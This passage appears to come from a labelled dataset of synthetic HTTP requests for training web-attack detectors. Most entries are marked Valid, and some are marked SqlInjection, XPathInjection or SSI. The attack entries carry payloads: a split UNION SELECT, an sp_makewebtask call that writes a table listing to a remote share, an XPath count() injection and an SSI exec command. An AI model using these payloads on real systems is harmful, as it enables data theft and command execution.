Accept-Language: oE-toa;q=0.0
Cache-Control: max-stale
Client-ip: 212.233.5.70
Cookie: Eed3aaws=o
Cookie2: $Version="585"
Date: Fri, 26 Dec 08 12:38:14 GMT
ETag: "4VdNvDxnQ_vOTnM_5thW"
Expect: Sqoc8=h1egNw
From: bteasrrn@to2anee.fr
If-Modified-Since: Sat, 28 Feb 09 11:29:34 GMT
If-Unmodified-Since: Sat, 02 May 09 22:08:15 GMT
If-Match: *
If-None-Match: "4qldFHMbB3wGsuO"
If-Range: Wed, 05 May 04 15:22:34 UTC
Max-Forwards: 66
MIME-Version: 5.7
Pragma: ni='eeom'
Proxy-Authorization: Digest nc=117fd3f5
Authorization: NTLM dG9sYTFUZW9ldHBuZnJpUmVURGV0b2l4Y2RBcmVuOFo0cw==
Range: 421490-
Referer: /bgklhu/upiieil.zip
TE: deflate,trailers,trailers
Trailer: Via
User-Agent: nIio6 (r5ercqnQ; hwvggqp; c1IJ3PBh5; eg2LRW; olKfZEIGU)
UA-CPU: MIPS
UA-Disp: 123,4822,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 165x736
Via: 3.1 228.169.174.162, HTTP/8.1 43.175.251.105
Transfer-Encoding: deflate
Upgrade: trto/1.0
Warning: 833 144.28.17.62 "isfwPh1kyWgl" "Sun, 24 Sep 06 16:28:02 UTC"
X-Forwarded-For: 61.166.42.173
X-Serial-Number: 447031171
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12030
Start - Id: 41766
class: SqlInjection
GET /tOy7ZH/exn1Gjb@Bz/rvsDDKv3Zfji/oHrENo/veworfwesclixO/qgQoFdaccess_logX7AB.swf?i4eOi0nRdnsj=dX4rl%7Etsa%257%5Cy%2F&7JycJ=47071619&mw=thLdd&e5sxam=51499295&eAd8ewue=fae&.FJ0Y=xhs%27o+u&eeeezie9nOe=%3B+++EXEC%28%27UNI%27%2B%27ON%27%2B%27+++++%27%2B%27SEL%27%2B%27ECT+++%27ynsni%27%2C86079%2C641080%2C%278aeeoneipe%27%2C9+++++FROM+++++0t7%29 HTTP/1.0
Host: 20.150.55.139:80
Connection: ZhencT
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.1
Accept-Language: wh2ao-mnd;q=0.1, It-TxlLtal;q=0.7
Cache-Control: min-fresh=26
Client-ip: 34.136.27.140
Cookie: rr=lrtputwnhr;is3aptprVe70eS=aetuhh;r9a72e=88157
Cookie2: $Version="0"
Date: Tue, 23 Oct 07 24:56:54 GMT
ETag: "Wc2Rnfj4sl@e6vV@QDMI"
Expect: osevnd
From: lngs3f@sl6ee5rs.it
If-Modified-Since: Mon, 26 Jan 04 07:28:11 GMT
If-Unmodified-Since: Sun, 28 May 06 15:22:32 CET
If-Match: *
If-None-Match: "92z8xHer8Z3P36eMQL.a"
If-Range: *
Max-Forwards: 9356
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: NTLM bnR0b1I2ZWVzdGlybmVJaG5lOG1lbm43YmV0dGFmbW4yZXdlTg==
Authorization: NTLM bmlpZWVncmx0cG53OWVhcWlzeXRzc294Y2x0cnR0dXMyRndhZWg=
Range: 4234-490888,-164882
Referer: http://x4ns2.gov/eieed/2gods.jsp
TE: gzip;q=0.2
Trailer: Upgrade
User-Agent: nEIoodt6 (0-W6ErBD; s8Uehhz@)
UA-CPU: 68000
UA-Disp: 9710,8359,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 391x8982
Via: FTP/6.6 80.232.6.242:88, 5.7 www.ltjet.js, 8.0 138.214.11.40
Transfer-Encoding: compress
Upgrade: hyt/2.3, usSsro/3.3, qhndkt/3.2, ay8/2.2
Warning: 047 www.s7aieai.js "nisluLPLAsoy" "Fri, 29 Jun 07 15:53:33 GMT"
X-Forwarded-For: 126.254.87.29
X-Serial-Number: 79451842006720281
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41766
Start - Id: 32582
class: Valid
POST /5dLF/gd41c_ls76EhKJS.u/aX1uPNDvAF/eE_iNUkEiuiYYJZ/436@s@7pzzbn_i/betweenGD@Xinsert.asmx? HTTP/1.0
Content-Length: 288
Content-Language: n79ae
Content-Encoding: identity
Content-Location: /ehnmii/la6irhdp/lmezk/evEor0ah/dtbrs.swf
Content-MD5: ZGd3N2V6ZXQ5cmV1bG5pYw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 25 Feb 07 06:30:38 CET
Last-Modified: Tue, 20 Apr 04 02:18:03 GMT
Host: 174.249.47.92
Connection: close
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 87.137.200.16
Cookie: 8ne=3382;2oGf=i7iEvhtisr;fuiemiTeisn=827;renasAOspe=]2heheLobject9aLftEe;aeIpsj=3099;uUxhXEj=348788552
Cookie2: $Version="79"
Date: Mon, 12 Dec 05 03:47:01 UTC
ETag: W/"UBd-YD3yBR8E8TwJERN"
Expect: 100-continue
If-Modified-Since: Mon, 22 May 06 01:07:52 UTC
If-Unmodified-Since: Thu, 17 Jul 08 02:14:52 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 913
MIME-Version: 1.6
Pragma: n=r
Proxy-Authorization: elil qeNA=drrh
Authorization: Basic Z3NuY2xmbGE6d25lTWRi
Range: -619576,782-7
Referer: /liQq9q/4wnil/xete/eosohp/ni6ns.avi
TE: trailers,deflate
Trailer: Accept-Charset
User-Agent: sts3tTisteldiugry
UA-CPU: Sparc
UA-Disp: 282,0738,8
UA-OS: Windows NT
UA-Pixels: 744x9728
Via: FTP/8.6 www.ewre.shtml, FTP/9.2 www.fnCwo.htm, FTP/7.7 86.146.234.33
Transfer-Encoding: deflate
Upgrade: nnoe/1.0, egmq/7.4, 9prh/1.1, eArAyt/8.4
Warning: 414 www.ihqtarr.htm "jOtricomadt8tg" 
X-Forwarded-For: 215.81.0.154
X-Serial-Number: 34552
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

ouhnmnh=j1yymv0&sir=15977478&einleaalo2ooD=ne&rlelern=eBzL&td=tcmdn&nh=\hm8iM3eist&thIhNy6ceUa=]Ohnz-:ba&4ld65irtoEInz=elroiehasa /a6i&prjlEca=0&JqeLl2hhesrr7n=9956&gh9wjavnmdcdntm=ephtr scriptscript6c2r=a:eeu&eu=erat-nli c&wtloowne=OrabnhnhUrfwt51&dzhprt=agtTs&uAe=1572055510

End - Id: 32582
Start - Id: 34914
class: Valid
PUT /nibn/P7UNlikecallS_Y/systemVh-AROu.iframe/sehaasrronqydy6d/elod/i7_HGTP3I-dV/nVMphprEfjsyz3wIO.mspx? HTTP/1.1
Content-Length: 107
Content-Language: 4dciilat
Content-Encoding: deflate
Content-Location: http://www.hpmqo8sa.it/6ocea/W5tts32n/moIviTi/Eon3kMug.gif
Content-MD5: VGlyaTFhdm9laHN3c2RMZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 22 Feb 10 17:12:20 UTC
Last-Modified: Sat, 07 Mar 09 13:43:53 CET
Host: 56.252.80.200:80
Connection: oMg3vtf
Accept: application/*;q=0.7
Accept-Charset: windows-1257;q=0.1, iso-8859-5;q=0.6, iso-8859-5, x-mac-japanese;q=0.5, utf-7
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=836
Client-ip: 188.174.74.16
Cookie: eh5enl=c5RIe;yaas9cz=rsimxanQ6Oc;9NPiloaioieuot=oecgCsYt9leasr;cdtepenfee72nD=$
Cookie2: $Version="2"
Date: Thu, 28 Jun 07 13:58:48 CET
ETag: W/"2ZGVZ7-h9APwrNSm"
Expect: 100-continue
From: cmiB@dzchl57eeb.fr
If-Modified-Since: Mon, 23 Jun 08 14:12:32 UTC
If-Unmodified-Since: Mon, 30 Jan 06 21:49:19 UTC
If-Match: "cKBTD1VRb9TK1Bw0e"
If-None-Match: "03aFeLVlHMB11sE1KS"
If-Range: "-6UcXA.F@lpTaED"
Max-Forwards: 19
MIME-Version: 5.1
Pragma: eTodAe=tAU
Proxy-Authorization: Digest nc=72e2B70C
Authorization: Basic ZW9uYTVtOndhdzdhd2Y=
Range: 620-856266,09-5,0-
Referer: http://otzxcxe.net/eideatbz/gtlhp/p7iee/iieo3A/1BeRrg.php3
TE: deflate
Trailer: Accept-Charset
User-Agent: Mozilla/6.5 (X11; U; Unix 6.9; so-te; rv:7.6.6) Gecko/69599005
UA-CPU: x86
UA-Disp: 7242,197,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 4336x049
Via: FTP/1.6 104.253.73.231
Transfer-Encoding: fets
Upgrade: dpoRne/8.4, htoozh/1.3
Warning: 142 223.248.82.42 "ljqtgix0lgu1sa" 
X-Forwarded-For: 69.156.101.181
X-Serial-Number: 5563045665
----: ---------------
~~~~~: ~~~~~~~~~~~~~

MzIWs1RPDA=sn ez&ahnttdMg=712037534&z@wF-S7@HV=i3anEd|53&nrasiOhoaiAT=wkodf&nogItkfO=31859783&tceq=uZo_Nv

End - Id: 34914
Start - Id: 3621
class: Valid
GET /neIs/tPV5QWD6/tVa6cmprZpB.js?ohsoselcRoeneh=226&usphayepsdtbe=%28Nql&coi5oXeittn=8943564&Mprocessing-instructiongbgsoundCwUAshutdown@=1796&OpGDNTsshk=de&fahsohrnLj=NaXtbn&Itt8=320303890&oa3r7ssii=uesw2wldaTeisue&esmnspaatqroiw=37738&WqsoiaeeeAsV=8815110 HTTP/1.1
Host: 63.225.190.205
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 252.185.30.148
Cookie: iNih=AdiewkopdLltsm;jo=28277;mAooIsHe8nTex0l=lnhpotTc;ng2aLe12fefxmh=rd.5m8z0l
Cookie2: $Version="387"
Date: Wed, 11 Nov 09 09:24:22 GMT
ETag: W/"8wNwJwg8pPZwh0Vq"
Expect: ttbs=Iammcyan;ehvTg=Btegrha
From: wunn@neo1eimeb.it
If-Modified-Since: Fri, 24 Mar 06 03:48:28 CET
If-Unmodified-Since: Tue, 17 Oct 06 09:20:30 GMT
If-Match: "dgINvNSiLJzCpzj-tI6"
If-None-Match: "6BY_XFpHbwxaEyo"
If-Range: Wed, 14 Apr 10 23:19:34 UTC
Max-Forwards: 9
MIME-Version: 7.2
Pragma: c0='ssci'
Proxy-Authorization: hgtwia lih5bE=ilsi
Authorization: Basic eXMybmE4bTplb29oaWw=
Range: -66041,943-,-24
Referer: http://www.rewey.net/uead/5eAn/hogrc5.php4
TE: trailers,trailers
Trailer: Trailer
User-Agent: lmttqavcS/2.0.7
UA-CPU: Sparc
UA-Disp: 8239,236,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 945x5264
Via: sts/1.8 www.liim.jpeg:14594, HTTP/4.6 98.60.73.206
Transfer-Encoding: compress
Upgrade: decg/1.7
Warning: 794 www.dlUteCja.htm "intmTihasyncs7wBlnT" "Sun, 26 Feb 06 19:18:11 UTC"
X-Forwarded-For: 20.131.248.228
X-Serial-Number: 41732
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3621
Start - Id: 35561
class: XPathInjection
PUT /cut1dBUV@cwB7/enss6esohviq2thef/HPpNautoexecYacceptm4eaccess_logvl4y/63p/-_UandYyUK30anXxK/4W4_YJ/e_m7L/php3lrSkHnodewG8nI/tiO9/bQOhxSE9XYJ@3tm@/cT/i6NethnasudfUeiresud.shtml? HTTP/1.0
Content-Length: 258
Content-Language: 2e,eeh,8
Content-Encoding: deflate
Content-Location: http://www.ipoa.fr/coee8g/ertieczt.php
Content-MD5: ZnduZTFFNGltdTVoeWhBaA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 15 Mar 07 23:05:16 GMT
Last-Modified: Sun, 21 Feb 10 04:06:23 UTC
Host: www.grati.it
Connection: keep-alive
Accept: text/plain, audio/basic;q=0.3, video/*
Accept-Charset: koi8-r, euc-kr, koi8-r;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 91.74.181.149
Cookie: NRf2exec9=64243;roenFtjogaaieR=9nsoesa5nayme5lo;sa9otdec=ltndekf3hpasswdvar10drehomed
Cookie2: $Version="8"
Date: Tue, 07 Sep 04 06:15:56 UTC
ETag: "v_dCT6QcvMRM03vgD95"
Expect: 100-continue
From: 8ty7e@ti3yral5l.de
If-Modified-Since: Tue, 20 Nov 07 17:50:37 CET
If-Unmodified-Since: Fri, 22 Aug 08 23:30:39 UTC
If-Match: *
If-None-Match: ".HeVhjOUKFBDRA6-"
If-Range: "uf7azlJ_kVfg3dgG87"
Max-Forwards: 67
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: len2te ytHaNuew=yalote
Authorization: sdtmu O5sgaii=4efatbhw
Range: -1,-1839
Referer: http://www.grse.cz/nes9.html
TE: deflate;q=0.5,trailers,trailers
Trailer: Via
User-Agent: s84O_DAFzC http://www.etfsinf0.net
UA-CPU: 68000
UA-Disp: 0509,6144,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 174x8533
Via: 2.4 57.208.101.253, een/1.5 173.110.188.137
Transfer-Encoding: identity
Upgrade: ihret/7.1, korlrr/8.1, oqs1/4.8, miil/4.8, mtdoz/9.8
Warning: 722 www.m4ra.shtml "sdeauds0gf4sot" "Tue, 26 Jul 05 11:16:52 GMT"
X-Forwarded-For: 219.76.123.80
X-Serial-Number: 42337082181389056
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

lajursthanccs=ehu&u5hET=Amheoa7e&oogd=9264&6h=out' or   6    <  count(path/child::*)     or   'Wdnnt6ql'    = '&wae1us7otxrouc=aer&UgqSRarn=stie&ida2d= w?q&hViHIdeletePX=527213&OtB1_z.yjI6T=3&tt=hec(all&.Og0nph-Dgroup bykq=8(ntNnf

End - Id: 35561
Start - Id: 21963
class: Valid
GET /51I13V.png?sseberf2hhrhnOa=1157445041&ntel8ehwt=8215885&rovseudFdteaww=0833&FP.Z=2586894&NoTlc=14841&ooqvhr7fieeb=et7mi9&any7qwvh=rORW1LrY&Pzih=433266&tlvoeitnwd=6&taaeenBa=ESs&ro5app5sugshtoc=38386089&eo=ti&thlrb=8&ed=884291 HTTP/1.1
Host: www.ciis.st
Connection: p4s4sl
Accept: audio/x-wav
Accept-Charset: iso-8859-7;q=0.7, x-mac-turkish;q=0.2, x-mac-chinesesimp;q=0.6, euc-kr
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: max-age=3946
Client-ip: 3.169.52.148
Cookie: isa=6876;samlzQ=6;kOg=6ltC62kisXedp]5;eseoofstom=l+
Cookie2: $Version="210"
Date: Fri, 16 Apr 04 14:55:11 CET
ETag: W/"bquNntauCwXOwIv9c"
Expect: tfdnhe=rmsnr;UkNdcMt
From: oIci6Moi@sbleMCwj.be
If-Modified-Since: Wed, 27 Apr 05 12:17:44 UTC
If-Unmodified-Since: Sat, 20 Sep 08 20:39:39 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 30 Jul 08 05:53:25 UTC
Max-Forwards: 27
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Basic Y3VkUzpocm5n
Authorization: NTLM c2hJcnJNc3R0b2FlenNhbnQ2ZHRTdGl0b2M5YTN5YmVzdGJ0dGNzeGg=
Range: 99-8956,05459-
Referer: /rlexsceT/ads6e.nsf
TE: trailers
Trailer: Expect
User-Agent: 7ptg1hidrMhreo
UA-CPU: x86
UA-Disp: 514,290,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 044x0436
Via: 6o6s2w/8.8 61.26.246.103
Transfer-Encoding: arbb
Upgrade: fysst/0.3
Warning: 945 www.u1eyergi.jpg:82873 "ihvut8ngwso" 
X-Forwarded-For: 133.218.232.127
X-Serial-Number: 09176432061314
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21963
Start - Id: 126
class: Valid
GET /tlkvovHI3AZT67eFv/ibtettapjrl8smlnode.gif?Oe=57291451&eSnweiutHoon=ake&ra=includeo%290aNfromtp&Swheres73E=7939&Yeajn3eiMk5eo=otiPE8T.Z&nina5jdf=r%2Fcate&zmzefLrarbeGe=echo4%7E%3BszPle8Ear9tmpAets&etnhpbntn54Stwt=Ilowget&ni8ETisePaZt=02115&1uI9=Jevalki%5D%26htopenO5&qrscfLielieL=74&poutya=rlebotdvt&i3deneedeo5Uo=stdini&ansh=n+0kt HTTP/1.1
Host: www.eua5l6o.uk
Connection: irhuh
Accept: audio/basic;q=0.6
Accept-Charset: *
Accept-Encoding: compress, compress;q=0.2, gzip, deflate;q=0.0, compress;q=0.4
Accept-Language: *
Cache-Control: k='nuv'
Client-ip: 158.91.217.33
Cookie: shat=nt M\)poh e
Cookie2: $Version="072"
Date: Thu, 13 Mar 08 24:33:23 UTC
ETag: W/"zPvAW0_AsQdn8mMa"
Expect: iitiiri=eht2a
From: yiboT07e@nnhseug2l.org
If-Modified-Since: Tue, 26 Jun 07 15:03:04 CET
If-Unmodified-Since: Wed, 23 Nov 05 09:32:47 GMT
If-Match: "Uvra_TQf56T.NnfPTW"
If-None-Match: *
If-Range: *
Max-Forwards: 38
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: NTLM cm1lbmdlZGxjenVlT3RkbGl1cm5UcG1xbWhzdG8zY2FvY2lzNG9kcGFkdHh0cjQ=
Authorization: Basic cnk5YWl1OnRvZXdzbnU0
Range: -84012,-01335,-234
Referer: http://www.eno7.uk/etelotr/ybst/qoehi/gaxapia/esoha9d.dll
TE: trailers,chunked;q=0.7
Trailer: If-Range
User-Agent: tyai78 (nJmK46G; mVg_SQK; sT-HRy02X1; rWRTtluxaf; fb_IWEL@no)
UA-CPU: MIPS
UA-Disp: 548,370,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 9197x616
Via: FTP/4.5 154.128.188.240, gpi/0.5 147.27.144.239:153, Afi1A/5.2 85.34.78.252
Transfer-Encoding: gzip
Upgrade: 6hilg/1.0
Warning: 450 100.128.62.52 "l3taFui4sbggwllhtg8" "Mon, 13 Jun 05 09:06:55 UTC"
X-Forwarded-For: 175.234.36.217
X-Serial-Number: 74970351581
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 126
Start - Id: 5203
class: Valid
PUT /Beggirzj/Fto/oRUton3kH/UFmtrnEa1nyaa0Ie2xt/oceinozprj4R3Ap2sTo.exe? HTTP/1.1
Content-Length: 69
Content-Language: naemso,a6ood,o
Content-Encoding: gzip
Content-Location: /fwtnsb/mA2orio/ttgm8e/otwsy9yt.txt
Content-MD5: eWR0ZWdnaGFlbHR3Y29zbw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 01 Jun 06 10:22:51 GMT
Last-Modified: Mon, 12 May 08 05:49:11 GMT
Host: 195.41.182.136:76
Connection: close
Accept: audio/*;q=0.2
Accept-Charset: x-mac-chinesetrad, iso-8859-2, shift_jis;q=0.9, windows-1251, koi8-r;q=0.9
Accept-Encoding: 
Accept-Language: msuhh7c-8vorW;q=0.6, sug-ukrtWowr;q=0.8
Cache-Control: max-stale=14
Client-ip: 65.23.172.54
Cookie: fgl=rr~ji;mhbvesE=winoedchild
Cookie2: $Version="7"
Date: Thu, 20 Sep 07 19:51:42 CET
ETag: W/"XIDp6nIWE@M@JC_Zu9Mo"
Expect: 100-continue
From: rbstcLe8@fi0i.uk
If-Modified-Since: Wed, 25 Oct 06 01:11:17 UTC
If-Unmodified-Since: Wed, 15 Apr 09 11:35:37 GMT
If-Match: "xneQDEueY9-QVQnHNsqB"
If-None-Match: "_Bo3Io1aeZYAn_.K"
If-Range: *
Max-Forwards: 901
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: NTLM cnptb29HaWVua0huZUF5b3luenVlYWlUcGFoaWVpbkliZXJFbHVhb2t0YTlX
Authorization: Basic ZWV0VG50dDp4b2hkZWllNg==
Range: 8-,441-787
Referer: http://www.rwot.uk/fRchE/emlh/trem/osnnnad.jpeg
TE: trailers,trailers
Trailer: Range
User-Agent: Mozilla/3.3 (Machintosh; U; PPC Mac OS X 5.8; 0r-Vi; rv:4.2.0) Gecko/38389081
UA-CPU: MIPS
UA-Disp: 696,288,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 523x221
Via: 3.0 www.abyBniDr.jpg
Transfer-Encoding: identity
Upgrade: KrhdGB/4.0, shDEy/8.3, qefaou/5.5, axat/2.9, hEyue/8.6
Warning: 746 188.123.7.9 "itaeperj7ydeteaei1" 
X-Forwarded-For: 121.55.87.94
X-Serial-Number: 083639126
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

tieRe7=119185&lAwarr=yazy3APx&i9seoehieTcrtp=s0fVeDd3&olenhfzehnoDm=3

End - Id: 5203
Start - Id: 35060
class: SqlInjection
GET /d6feumle/asuN3lEbbExNRZ/xyb2GGS5wx/yXU2urCEY_n/ot5.asp?erdrpsieonsdhn=trw&NeBh4Hsoeraae=m2i1%3Fe+Gns&2urhmrnes=%3D&Gepanmtsxnnsw=ogscV&eaerLdpnfgne=aD3&u1Dojc=21&Smot=%27%3B+++EXEC+master..sp_makewebtask+++++%22%5C%5C154.205.103.95%5Ctz%5Cco.html%22%2C+++++%22SELECT++*+++++FROM++INFORMATION_SCHEMA.TABLES%22&zadnhr=orp&oad=3&bincludetDAmeta0likerkzW=rsformzqsnh8rt0ded&jr6crnetgpmoe=4 HTTP/1.1
Host: 183.152.46.96:80
Connection: close
Accept: audio/*, text/xml;q=0.4
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 243.80.185.17
Cookie: eo=tvJPonlkwc
Cookie2: $Version="16"
Date: Sun, 10 Jun 07 14:14:16 GMT
ETag: W/"-i8OCTZDs9wjs6139OT"
Expect: 4en1t=spype;iksuo0L=mtJuin
If-Modified-Since: Sun, 15 Jun 08 06:31:07 GMT
If-Unmodified-Since: Fri, 26 Mar 04 24:31:06 GMT
If-Match: "9.9F5a9MwmVClUI"
If-None-Match: "Dq4a30R8SBQMWsUr"
If-Range: Thu, 29 Jun 06 13:22:41 GMT
Max-Forwards: 4
MIME-Version: 0.3
Pragma: utds1ron='Bp'
Proxy-Authorization: Basic aFJpQzpidHN1bw==
Authorization: 1uyset 7htgosl=aeiFrae
Range: 478-841920,54-454132
Referer: /odgbass/nwttmo/5owIelbI/saai/sduihLk.png
TE: trailers,trailers,trailers
Trailer: Accept-Encoding
User-Agent: ny9twm
UA-CPU: 68000
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 989x6143
Via: HTTP/2.6 www.lbtfe.js:08
Transfer-Encoding: deflate
Upgrade: l5i/1.7, lDqw/9.3, ade/1.3, rst/9.9
Warning: 825 www.eezs.png:4813 "dnlyiz8ddawi9eucren" 
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35060
Start - Id: 34067
class: Valid
PUT /f8iltegklotattw/7yarp/Dr9wbvoe/4bot/XZsam.js? HTTP/1.0
Content-Length: 231
Content-Language: leael,seSl
Content-Encoding: compress
Content-Location: http://uttts4on.it/nthzfte/ksertnwv/tcoolti.ace
Content-MD5: SGlFbGVvZ3NhcmhPbWRzdA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 23 Jul 06 06:51:16 UTC
Last-Modified: Mon, 01 Nov 04 10:34:17 UTC
Host: 225.105.224.198
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: koi8, x-mac-greek
Accept-Encoding: compress;q=0.0
Accept-Language: wecea-tqa1ylee, mcrdHrew-mw;q=0.2, 4titisn-2e;q=0.7, ga-lgdner;q=0.1
Cache-Control: no-transform
Client-ip: 239.85.198.102
Cookie: nlnt=t;;Brcpu@iukconnectlRY=8uHZ;8hr2erd=ibetweenmuRici\tTme6;jQbBPRiWfLUp=y6nnaAthnaebt;ntunEnrams=0
Cookie2: $Version="13"
Date: Sun, 11 Dec 05 08:41:55 UTC
ETag: W/"xO92uavFzjswVlOknz"
Expect: 100-continue
From: r5nt9@0rtslk.org
If-Modified-Since: Wed, 12 Oct 05 13:55:21 UTC
If-Unmodified-Since: Tue, 15 Jun 04 06:33:18 UTC
If-Match: "CIyevXc3nM2toqP4@6QF"
If-None-Match: *
If-Range: Sun, 23 Apr 06 07:17:14 CET
Max-Forwards: 93
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: Digest algorithm=3ugedca2
Authorization: Digest algorithm=MD5-sess
Range: -1571,35028-798,-78661
Referer: /pytoucu/7rtga/yphYc.asp
TE: trailers
Trailer: TE
User-Agent: Mozilla/4.0 (Machintosh; U; PPC 4.0; td-Sr; rv:3.2.2) Gecko/52686274
UA-CPU: x86
UA-Disp: 2533,0787,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 9061x3656
Via: HTTP/8.2 182.5.122.124, 7.4 191.189.156.227, uqNthe/4.7 www.saczt.jpg:74669
Transfer-Encoding: deflate
Upgrade: qhe6/5.5, Ndaod/1.6, zcbn/9.5, tweeah/0.8, v9imgh/0.4
Warning: 657 www.eWibEanz.tiff "iaEat" "Mon, 06 Jul 09 07:37:50 GMT"
X-Forwarded-For: 217.182.237.209
X-Serial-Number: 155066
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

afhgaesaet7sjm=9NIJ5lIVt75&EsdAtreeansasr=g21fapnahlcatnllSa@&k1aeos2fofthetq= f&aeikss=rxwXPcUkvN&agtdfwhWlrse2r=otjneeprTe&MkQ6bPupdate=etojekhde9qTprw&y5eeprn7c2hhfr=731&ytsirheT=cneSsoorEt3ee1eoE&tafe=~U?efe&Eosedgj=ereCe

End - Id: 34067
Start - Id: 40306
class: SSI
GET /tjxAsHsTL/gd0/TyfihcQeahcnstnit9w/rg8M0moDsXlrmNvllU4/bqt9utan0acLmt/gtltYdWL/3nZZga7jFlr/no0tbrktshlT/h-PyePzu-f/N5.msf?umrii=ty&swe=10&stinh=%3C%21--+%23exec+cmd%3D%22c%3A%5Cprogra%7E1%5Cb9sko%5Ccsnalra%5Chrs.exe++++d%3A%5Ccocklw%5Cwww.niar.org%5CJOedttiaar%5Cdatabase.mdb+++++%2Fx++exporttofoxpro%22--%3E&dtmprin=Ervar&th=h&Eosevfs=76570&liWKFxvbu=37656626 HTTP/1.0
Host: 15.143.193.66
Connection: nawoleg
Accept: image/*;q=0.7, video/*;q=0.8
Accept-Charset: iso-8859-15, iso-8859-5
Accept-Encoding: gzip, deflate;q=0.2, gzip;q=0.1, gzip, deflate;q=0.3
Accept-Language: *
Cache-Control: no-cache
Client-ip: 189.175.1.221
Cookie: q7uWlQLXI5D=tQWNVisew
Cookie2: $Version="373"
Date: Fri, 12 Mar 10 02:09:49 GMT
ETag: W/"ztq.n1@Vxt5yhX6hKco"
Expect: 100-continue
From: Yphp8ra@sCnoSst6.de
If-Modified-Since: Fri, 20 Feb 09 19:19:36 CET
If-Unmodified-Since: Fri, 05 Mar 04 07:19:56 CET
If-Match: *
If-None-Match: "y_SlT4_eRTvMnxD@Fu2p"
If-Range: Fri, 12 Jun 09 17:20:40 UTC
Max-Forwards: 7435
MIME-Version: 3.6
Pragma: k1ih5L=eerhtEq
Proxy-Authorization: NTLM MTR2dHIxOWJoZWlrZ2huYWVUc2VubjJlYXhnb2k3ZXQ=
Authorization: NTLM ZW9zcnRmcjVvaWUwbGVyNmxlZWFpN3NhbHRpNjdGZXpvdG5lNGJkNGZlaGVoaW1j
Range: -2115,0045-233,-51
Referer: http://iemtao.org/eo4aei/dor8/memo/5tad/bgEntCnp.pdf
TE: deflate;q=0.5,chunked;q=0.9,trailers
Trailer: If-None-Match
User-Agent: i@r_elV25 http://www.eeameng.gov
UA-CPU: 68000
UA-Disp: 996,846,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 2184x777
Via: 0.3 78.171.60.206
Transfer-Encoding: identity
Upgrade: hiCkrp/2.9, tclcr/7.7, ntp5/3.3, her/1.8
Warning: 285 39.249.111.46 "orhrou3Uo8amdcneinui" "Sun, 02 Sep 07 09:37:14 CET"
X-Forwarded-For: 154.142.43.224
X-Serial-Number: 475557970524
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40306
Start - Id: 32129
class: Valid
GET /6Ku4T2E/bpnesyf1bo7tX/p4AselectB8Rkn/dd-VeJ_jKYXJIhu1e4N/YsrseomOepAa.cgi?etcCpVrm8=tnu1rfnpRg&giI1iq=64&netv=mao&Ehi=eliraetapoc1t&alS3=reasearfEdocument&sVG-=1&Ash=526553&V1e6=411&tec=ajsU&CmlMvoaomdde=694&bswvettsttTu=ytw%2B+if%25&tet1Tt5totEs=eoce1Ei&noTiLine=04&aeese=2325467&im=cnSottesntTcln1at HTTP/1.1
Host: 4.16.238.131:23059
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: unshi-o6c
Cache-Control: min-fresh=214
Client-ip: 70.112.71.224
Cookie: dRIo1hw6rdu=altmdstnii;RbLBVb=yKveknkH4;twi=532317;JAj2=kiFli;z8FTMzw=oeatrwlhwr4yeiEp;Hsmlrtarsr=srHTex7
Cookie2: $Version="69"
Date: Mon, 14 Feb 05 21:59:59 GMT
ETag: "aUBON8bikKF1ecD"
Expect: 100-continue
From: leaama@iezirdm.it
